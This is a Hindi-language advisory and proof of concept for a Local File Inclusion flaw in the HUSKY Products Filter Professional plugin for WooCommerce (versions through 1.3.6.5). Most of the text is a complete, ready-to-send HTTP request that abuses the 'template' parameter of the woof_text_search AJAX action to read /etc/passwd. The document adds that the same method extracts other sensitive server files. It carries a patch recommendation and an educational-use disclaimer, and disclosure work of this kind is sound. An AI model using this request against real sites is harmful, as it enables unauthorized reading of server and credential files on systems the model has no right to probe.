
HUSKY – Products Filter Professional for WooCommerce प्लगइन WordPress के लिए Local File Inclusion (LFI) के प्रति संवेदनशील है
WordPress के लिए HUSKY – Products Filter Professional for WooCommerce प्लगइन 1.3.6.5 तक के सभी संस्करणों में woof_text_search AJAX एक्शन के template पैरामीटर के माध्यम से स्थानीय फ़ाइल समावेशन (LFI) के लिए संवेदनशील है।
यह अनधिकृत हमलावरों को सर्वर पर मनमानी फ़ाइलों को शामिल करने और निष्पादित करने की अनुमति देता है, जिससे संभावित रूप से निम्नलिखित हो सकता है:
<= 1.3.6.51.3.6.6संस्करण 1.3.6.6 या उससे नए पैच किए गए संस्करण में अपडेट करें।
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
action=woof_text_search&
4. सफल होने पर, सर्वर /etc/passwd की सामग्री लौटाएगा।
5. इसका उपयोग सर्वर से अन्य संवेदनशील फ़ाइलों को निकालने के लिए किया जा सकता है।
यह PoC केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत परीक्षण अवैध और अनैतिक है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा स्पष्ट प्राधिकरण प्राप्त करें।